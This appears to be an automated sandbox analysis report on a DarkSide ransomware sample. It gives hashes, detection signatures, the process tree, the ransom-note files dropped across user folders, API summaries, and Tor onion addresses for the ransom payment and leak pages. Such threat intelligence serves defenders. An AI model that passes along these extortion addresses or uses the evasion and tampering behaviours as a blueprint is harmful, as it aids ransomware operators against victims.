Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report P3FwQWmwUM.exe

Overview

General Information

Sample Name:P3FwQWmwUM.exe
Analysis ID:411752
MD5:c4da0137cbb99626fd44da707ae1bca8
SHA1:a38e9891152755d9e7fff7386bb5a1bca375bd91
SHA256:1d4c0b32aea68056755daf70689699200ffa09688495ccd65a0907cade18bd2a
Tags:darksideOASISCOURTLIMITEDransomwaresigned
Infos:

Most interesting Screenshot:

Detection

DarkSide
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found ransom note / readme
Multi AV Scanner detection for submitted file
Yara detected DarkSide Ransomware
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionalty to change the wallpaper
Found Tor onion address
Machine Learning detection for sample
PE file has a writeable .text section
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Entry point lies outside standard sections
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files

Classification

Startup

  • System is w10x64
  • P3FwQWmwUM.exe (PID: 5976 cmdline: 'C:\Users\user\Desktop\P3FwQWmwUM.exe' MD5: C4DA0137CBB99626FD44DA707AE1BCA8)
  • P3FwQWmwUM.exe (PID: 6020 cmdline: 'C:\Users\user\Desktop\P3FwQWmwUM.exe' MD5: C4DA0137CBB99626FD44DA707AE1BCA8)
    • P3FwQWmwUM.exe (PID: 1600 cmdline: 'C:\Users\user\Desktop\P3FwQWmwUM.exe' MD5: C4DA0137CBB99626FD44DA707AE1BCA8)
      • P3FwQWmwUM.exe (PID: 2900 cmdline: C:\Users\user\Desktop\p3fwqwmwum.exe -work worker0 -path \\?\C:\ MD5: C4DA0137CBB99626FD44DA707AE1BCA8)
  • svchost.exe (PID: 5964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5892 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5408 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3996 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5968 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6248 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6356 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6388 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6076 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • notepad.exe (PID: 7048 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT MD5: BB9A06B8F2DD9D24C77F389D7B2B58D2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\README.2c9ccbf3.TXTJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
    C:\README.2c9ccbf3.TXTJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
      C:\README.2c9ccbf3.TXTJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
        C:\README.2c9ccbf3.TXTJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
          C:\README.2c9ccbf3.TXTJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
            Click to see the 30 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000004.00000003.432905231.0000000002DB4000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
              00000004.00000003.362840336.0000000002B69000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
                00000004.00000003.327849253.0000000000849000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
                  00000004.00000003.411060522.0000000002D70000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
                    00000004.00000003.408654426.0000000002B6A000.00000004.00000001.sdmpJoeSecurity_DarkSideYara detected DarkSide RansomwareJoe Security
                      Click to see the 129 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: P3FwQWmwUM.exeAvira: detected
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: P3FwQWmwUM.exeVirustotal: Detection: 45%Perma Link
                      Source: P3FwQWmwUM.exeReversingLabs: Detection: 62%
                      Machine Learning detection for sampleShow sources
                      Source: P3FwQWmwUM.exeJoe Sandbox ML: detected
                      Source: P3FwQWmwUM.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Desktop\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Documents\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Music\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Pictures\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Videos\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Downloads\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Favorites\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Links\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\History\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\WindowsApps\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Temp\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\Saved Games\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\README.2c9ccbf3.TXTJump to behavior
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\README.2c9ccbf3.TXTJump to behavior
                      Source: P3FwQWmwUM.exeStatic PE information: certificate valid
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00403EDD wcscat,FindFirstFileExW,wcsrchr,wcscpy,FindNextFileW,FindClose,1_2_00403EDD
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00401B91 wcslen,RtlAllocateHeap,wcscpy,wcscat,FindFirstFileExW,FindNextFileW,FindClose,RtlFreeHeap,1_2_00401B91
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_0040409F wcslen,RtlAllocateHeap,wcscpy,wcscat,FindFirstFileExW,wcslen,wcslen,RtlAllocateHeap,wcscpy,wcsrchr,wcscpy,GetFileAttributesW,RemoveDirectoryW,RtlFreeHeap,DeleteFileW,RtlFreeHeap,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,1_2_0040409F
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_004066AC wcslen,RtlAllocateHeap,wcscpy,GetFileAttributesW,wcscat,FindFirstFileExW,wcslen,wcslen,RtlAllocateHeap,wcscpy,wcsrchr,wcscat,GetFileAttributesW,wcsstr,FindNextFileW,FindClose,RtlFreeHeap,RtlFreeHeap,1_2_004066AC
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00403FBA wcscpy,wcscat,FindFirstFileExW,wcscpy,wcscat,FindNextFileW,FindClose,1_2_00403FBA
                      Source: C:\Users\user\Desktop\P3FwQWmwUM.exeCode function: 1_2_00403E86 GetLogicalDriveStringsW,GetDriveTypeW,1_2_00403E86

                      Networking:

                      barindex
                      Found Tor onion addressShow sources
                      Source: P3FwQWmwUM.exe, 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmpString found in binary or memory: Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
                      Source: P3FwQWmwUM.exe, 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmpString found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
                      Source: P3FwQWmwUM.exe, 00000004.00000003.474064504.0000000002B42000.00000004.00000001.sdmpString found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
                      Source: P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmpString found in binary or memory: Your personal leak page: http://darksidedxcftmqa.onion/blog/
                      Source: P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmpString found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9D
                      Source: P3FwQWmwUM.exe, 00000004.00000003.460157247.0000000002DB3000.00000004.00000001.sdmpString found in binary or memory: Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
                      Source: P3FwQWmwUM.exe, 00000004.00000003.321471581.00000000007F2000.00000004.00000001.sdmpString found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPR
                      Source: P3FwQWmwUM.exe, 00000004.00000003.411544467.0000000002B47000.00000004.00000001.sdmpString found in binary or memory: Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
                      Source: P3FwQWmwUM.exe, 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmpString found in binary or memory: Your personal leak page: http://darksidedxcftmqa.onion/blog/article/
                      Source: P3FwQWmwUM.exe, 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmpString found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P8
                      Source: P3FwQWmwUM.exe, 00000004.00000002.510936905.0000000000768000.00000004.00000020.sdmpString found in binary or memory: Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wk
                      Source: P3FwQWmwUM.exe, 00000004.00000003.296079532.0000000002AB0000.00000004.00000001.sdmpString found in binary or memory: l leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
                      Source: P3FwQWmwUM.exe, 00000004.00000003.296079532.0000000002AB0000.00000004.00000001.sdmpString found in binary or memory: |l leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
                      Source: P3FwQWmwUM.exe, 00000004.00000003.415423650.0000000002B47000.00000004.00000001.sdmpString found in binary or memory: Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O7h
                      Source: notepad.exe, 00000016.00000002.501980566.0000019FB6AD4000.00000004.00000020.sdmpString found in binary or memory: r website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
                      Source: notepad.exe, 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmpString found in binary or memory: Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
                      Source: notepad.exe, 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmpString found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
                      Source: README.2c9ccbf3.TXT22.4.drString found in binary or memory: Your personal leak page: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
                      Source: README.2c9ccbf3.TXT22.4.drString found in binary or memory: 2) Open our website: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
                      Source: P3FwQWmwUM.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                      Source: P3FwQWmwUM.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: svchost.exe, 00000006.00000002.510518986.0000020C762D2000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                      Source: P3FwQWmwUM.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                      Source: P3FwQWmwUM.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmpString found in binary or memory: http://darksidedxcftmqa.onion/blog/
                      Source: P3FwQWmwUM.exe, 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmpString found in binary or memory: http://darksidedxcftmqa.onion/blog/article/
                      Source: P3FwQWmwUM.exe, 00000004.00000002.510936905.0000000000768000.00000004.00000020.sdmpString found in binary or memory: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wk
                      Source: P3FwQWmwUM.exe, 00000004.00000003.296079532.0000000002AB0000.00000004.00000001.sdmp, notepad.exe, 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, README.2c9ccbf3.TXT22.4.drString found in binary or memory: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbr
                      Source: P3FwQWmwUM.exe, 00000004.00000003.415423650.0000000002B47000.00000004.00000001.sdmpString found in binary or memory: http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O7h
                      Source: P3FwQWmwUM.exe, 00000004.00000002.516426859.0000000002D40000.00000004.00000001.sdmpString found in binary or memory: http://darksidfqzcuhtk2.onion/K71D6P8
                      Source: P3FwQWmwUM.exe, 00000004.00000003.321471581.00000000007F2000.00000004.00000001.sdmpString found in binary or memory: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPR
                      Source: P3FwQWmwUM.exe, 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmp, P3FwQWmwUM.exe, 00000004.00000003.474064504.0000000002B42000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.411544467.0000000002B47000.00000004.00000001.sdmp, notepad.exe, 00000016.00000002.501980566.0000019FB6AD4000.00000004.00000020.sdmp, notepad.exe, 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, README.2c9ccbf3.TXT22.4.drString found in binary or memory: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
                      Source: P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmpString found in binary or memory: http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9D
                      Source: svchost.exe, 00000006.00000002.510518986.0000020C762D2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: svchost.exe, 00000006.00000002.510518986.0000020C762D2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                      Source: P3FwQWmwUM.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: P3FwQWmwUM.exeString found in binary or memory: http://ocsp.sectigo.com0%
                      Source: svchost.exe, 00000006.00000002.522409527.0000020C7BB50000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: svchost.exe, 0000000C.00000002.312755628.000001F743213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.comr
                      Source: svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000002.511163775.000002AA91043000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000C.00000003.312159045.000001F743247000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.312159045.000001F743247000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312297935.000001F743240000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.312226392.000001F74325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000C.00000003.312128129.000001F74325F000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000C.00000003.289664910.000001F743231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: P3FwQWmwUM.exeString found in binary or memory: https://sectigo.com/CPS0
                      Source: P3FwQWmwUM.exeString found in binary or memory: https://sectigo.com/CPS0D
                      Source: svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000C.00000002.312755628.000001F743213000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.312853819.000001F74323D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.312282264.000001F743245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.312282264.000001F743245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.289664910.000001F743231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000C.00000003.289664910.000001F743231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000C.00000003.312159045.000001F743247000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                      Source: P3FwQWmwUM.exe, 00000001.00000002.232594392.00000000007AA000.00000004.00000020.sdmp, P3FwQWmwUM.exe, 00000004.00000003.474064504.0000000002B42000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.317859109.00000000007F2000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.332042030.00000000007D8000.00000004.00000001.sdmp, P3FwQWmwUM.exe, 00000004.00000003.409934886.0000000002B69000.00000004.00000001.sdmp, notepad.exe, 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, README.2c9ccbf3.TXT22.4.drString found in binary or memory: https://torproject.org/
